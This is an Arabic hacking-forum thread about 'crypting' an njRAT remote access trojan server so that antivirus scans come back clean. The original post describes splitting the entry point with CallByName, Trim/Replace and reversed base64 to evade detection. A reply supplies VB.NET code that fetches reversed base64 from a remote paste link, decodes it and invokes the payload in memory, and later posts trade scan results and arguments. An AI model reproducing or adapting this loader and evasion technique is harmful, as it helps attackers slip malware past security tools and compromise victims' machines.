Re-Write EntryPoint Again And Get Good Results In The Scan

تم تحميل الصفحة في 1,7451222 ثانية
Re-Write EntryPoint Again And Get Good Results In The Scan
إنضم
15 نوفمبر 2017
المشاركات
181
الإعجابات
240
النقاط
53
السلام عليكم ورحمة الله وبركاته

الموضوع :

تشفير سيرفر نجرات كلين (0/16)

نتيجة الفحص : Test.exe - Le scanner anti-virus de Jotti

الشرح :

أعادة كتابة نقطة الأدخال بشكل جديد وتخطي أقوى الحمايات مع خوارزمية بيس 64

تم الأعتماد على دالة CallByName في عملية تقسيم نقطة الأدخال الى 3 أجزاء ثم قمت بأستغلال دالة Trim و Replace في توهيم الحمايات وللتخلص من قيمة Gen في بعض الحمايات

عكس قيم البيس 64 حتى يتم تخطي بعض الحمايات التي تعتمد على كشف تسلسل القيمة المستخدمة

تابع الفيديو حتى تفهم الشرح بشكل أكثر وأبسط


في أمان الله
 

الرّوسي

مشرف اقسام الجوال
إنضم
2 سبتمبر 2010
المشاركات
12,800
الإعجابات
9,669
النقاط
160
الإقامة
TUNISIE#
السلام عليكم ورحمة الله وبركاته

الموضوع :

تشفير سيرفر نجرات كلين (0/16)

نتيجة الفحص : Test.exe - Le scanner anti-virus de Jotti

الشرح :

أعادة كتابة نقطة الأدخال بشكل جديد وتخطي أقوى الحمايات مع خوارزمية بيس 64

تم الأعتماد على دالة CallByName في عملية تقسيم نقطة الأدخال الى 3 أجزاء ثم قمت بأستغلال دالة Trim و Replace في توهيم الحمايات وللتخلص من قيمة Gen في بعض الحمايات

عكس قيم البيس 64 حتى يتم تخطي بعض الحمايات التي تعتمد على كشف تسلسل القيمة المستخدمة

تابع الفيديو حتى تفهم الشرح بشكل أكثر وأبسط


في أمان الله
اكتب كود مباشرة
 

MR(AHMED1)

اسطوره لن تتكرر
rankrankrank
إنضم
25 أكتوبر 2012
المشاركات
583
الإعجابات
627
النقاط
93
C:
 Dim WW = "{+}{+}{+}{+}{+}".Replace("{+}{+}{+}{+}{+}", "Load")

        Dim EE = "{*}{*}{*}{*}{*}".Replace("{*}{*}{*}{*}{*}", "EntryPoint")

        Dim RR = "{#}{#}{#}{#}{#}".Replace("{#}{#}{#}{#}{#}", "Invoke")
        Dim TT = Interaction.CallByName(System.Threading.Thread.GetDomain(), Trim(WW), CallType.Method, البايت هنا)
        Dim YY = Interaction.CallByName(TT, Trim(EE), CallType.Get)
        Dim UU = Interaction.CallByName(YY, Trim(RR), CallType.Method, 0, New Object(-1) {})
 

MR(AHMED1)

اسطوره لن تتكرر
rankrankrank
إنضم
25 أكتوبر 2012
المشاركات
583
الإعجابات
627
النقاط
93
او عمل داونلود كلين عن طريق تحويل قيم السيفر الى بيز 64 معكوسه

C:
Module Module1
    Sub MAIN()




        Dim DOWNLOAD As New Net.WebClient
        Dim AHMED As String = "الرابط هناااااااااااااااا"
        Dim AHMED1 As Byte() = Convert.FromBase64String(StrReverse(DOWNLOAD.DownloadString(AHMED)))
        Dim WW = "{+}{+}{+}{+}{+}".Replace("{+}{+}{+}{+}{+}", "Load")

        Dim EE = "{*}{*}{*}{*}{*}".Replace("{*}{*}{*}{*}{*}", "EntryPoint")

        Dim RR = "{#}{#}{#}{#}{#}".Replace("{#}{#}{#}{#}{#}", "Invoke")
        Dim TT = Interaction.CallByName(System.Threading.Thread.GetDomain(), Trim(WW), CallType.Method, AHMED1)
        Dim YY = Interaction.CallByName(TT, Trim(EE), CallType.Get)
        Dim UU = Interaction.CallByName(YY, Trim(RR), CallType.Method, 0, New Object(-1) {})

    End Sub



End Module
 

MR(AHMED1)

اسطوره لن تتكرر
rankrankrank
إنضم
25 أكتوبر 2012
المشاركات
583
الإعجابات
627
النقاط
93
إنضم
15 نوفمبر 2017
المشاركات
181
الإعجابات
240
النقاط
53
مشروع كلين جاهز كل اللى تعلمله تحويل قيم الى بيز 64 معكوسه ورفعها على موقع باست بين ووضع الرابط بالسورس
ومبروك عليك كلين يتخطى معظم الدفعات
FOR تحميل ● مركز رفع ملفات نقطة التطوير [ Dev-Point ]

الفحص \

https://virusscan.jotti.org/en-US/filescanjob/ls1yb3opxk
أظن الموضوع ليس بحاجة لكل هذا لأنه النتيجة كلين بدون أي تعديلات أضافية ولا تعاني من أي مشكلة يعني ما كان عليك تعمل كل هذه الأشياء على كل حال شكرا لمشاركتك أخي وشكرا لمرورك
 
إنضم
1 أغسطس 2012
المشاركات
369
الإعجابات
262
النقاط
173
الإقامة
العراق
شكرا اخي

لكن اظن موقع الفحص لم يعد موثوق
مافيه حمايات كتير حتى نقول كلين
ياريت التجربه على موقع أكثر حمايات
شكرا أحمد على طرح طرق جديده بالرد
 
إنضم
15 نوفمبر 2017
المشاركات
181
الإعجابات
240
النقاط
53
شكرا اخي

لكن اظن موقع الفحص لم يعد موثوق
مافيه حمايات كتير حتى نقول كلين
ياريت التجربه على موقع أكثر حمايات
شكرا أحمد على طرح طرق جديده بالرد
أنا كنت أفحص في موقع SpyRalScanner ومواقع كثيرة وتحتوي على حمايات كثيرة لكن بعد مرور وقت أكتشفت أنه لا تتم تحديث هذه الحمايات بشكل مستمر يعني أحتمال تشفيرتك بس تفحصها تطلع معك كلين وفي موقع آخر يكون مكشوف فهمت الفكرة وين كانت وموقع Jotti و VirusTotal هم من أفضل المواقع وأسرعها في عمليات التحديث المستمر للحمايات بدون أنتظار وقت على الموقع لكن عيبها الوحيد أنها تقوم بأرسال قيم بشكل سريع فقط أرجوا أن تكن وصلت الفكرة وشكرا لمرورك أخي
 
إنضم
27 أكتوبر 2009
المشاركات
361
الإعجابات
238
النقاط
63
أنا كنت أفحص في موقع SpyRalScanner ومواقع كثيرة وتحتوي على حمايات كثيرة لكن بعد مرور وقت أكتشفت أنه لا تتم تحديث هذه الحمايات بشكل مستمر يعني أحتمال تشفيرتك بس تفحصها تطلع معك كلين وفي موقع آخر يكون مكشوف فهمت الفكرة وين كانت وموقع Jotti و VirusTotal هم من أفضل المواقع وأسرعها في عمليات التحديث المستمر للحمايات بدون أنتظار وقت على الموقع لكن عيبها الوحيد أنها تقوم بأرسال قيم بشكل سريع فقط أرجوا أن تكن وصلت الفكرة وشكرا لمرورك أخي
مبدع بس مغرور
هههههههه
 

MR(AHMED1)

اسطوره لن تتكرر
rankrankrank
إنضم
25 أكتوبر 2012
المشاركات
583
الإعجابات
627
النقاط
93
أظن الموضوع ليس بحاجة لكل هذا لأنه النتيجة كلين بدون أي تعديلات أضافية ولا تعاني من أي مشكلة يعني ما كان عليك تعمل كل هذه الأشياء على كل حال شكرا لمشاركتك أخي وشكرا لمرورك
مبدع بس مغرور
هههههههه
أظن الموضوع ليس بحاجة لكل هذا لأنه النتيجة كلين بدون أي تعديلات أضافية ولا تعاني من أي مشكلة يعني ما كان عليك تعمل كل هذه الأشياء على كل حال شكرا لمشاركتك أخي وشكرا لمرورك
مبدع بس مغرور
هههههههه
بعد احترامى ليك لو عاوز تفيد الاعضاء اما ان كتبت الكود او اعطيت السورس لان العضو لا يسطيع الكتابه
انا ارى انك تستعرض عضلاتك فقط لا غير تقبل مرورى المتواضع مشروعك بيه اكواد bin
 
إنضم
15 نوفمبر 2017
المشاركات
181
الإعجابات
240
النقاط
53
بعد احترامى ليك لو عاوز تفيد الاعضاء اما ان كتبت الكود او اعطيت السورس لان العضو لا يسطيع الكتابه
انا ارى انك تستعرض عضلاتك فقط لا غير تقبل مرورى المتواضع مشروعك بيه اكواد bin
مع أحترامي الشديد ليك أنت شخص بس بدك تفرض شخصيتك في هذا الموضوع وأن شاء الله آخر مرة أشوفك في موضوع من مواضيعي لأني أنا سكتت كثير بصراحة وتحملتك أنا لم أنزل موضوع مشان تجي تتفلسف وأنا نزلت هذا الموضوع حتى تتعلم الناس وبغير هيك طريقة الناس ما رح تعرف تكتب بنفسها سطر واحد رح تضل عايشة على الكوبي بيست لو أريد أستعرض عضلاتي كما قلت كان ما قمت بعرض الأكواد للمشاهدين التي تم كتابتها في الفيديو وأن شاء الله آخر مرة أشوفك في مواضيعي لأنه ما بتشرفني بصراحة أنت من أول ما علقت وأنا قلت ما في مشكلة بس شفتك زودة شوي بالعيار قلت بكفيك وأنت مين سمحلك تنزل الأكواد جاهزة أظن هذا ليس موضوع خاص بك حتى تتحكم براحتك وتشتغل على كيفك روح أعرض مهاراتك الخارقة في مواضيعك وخلي رأيك لنفسك لأنه بصراحة رأيك ما بهمني خصوصا أنت أسلوبك هذا الي أنت عملته مع الأخ Hac Tool ما بمشي علي خليه لنفسك ولناس بترضاه على نفسها وشكرا لك للمشاركة في الموضوع
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل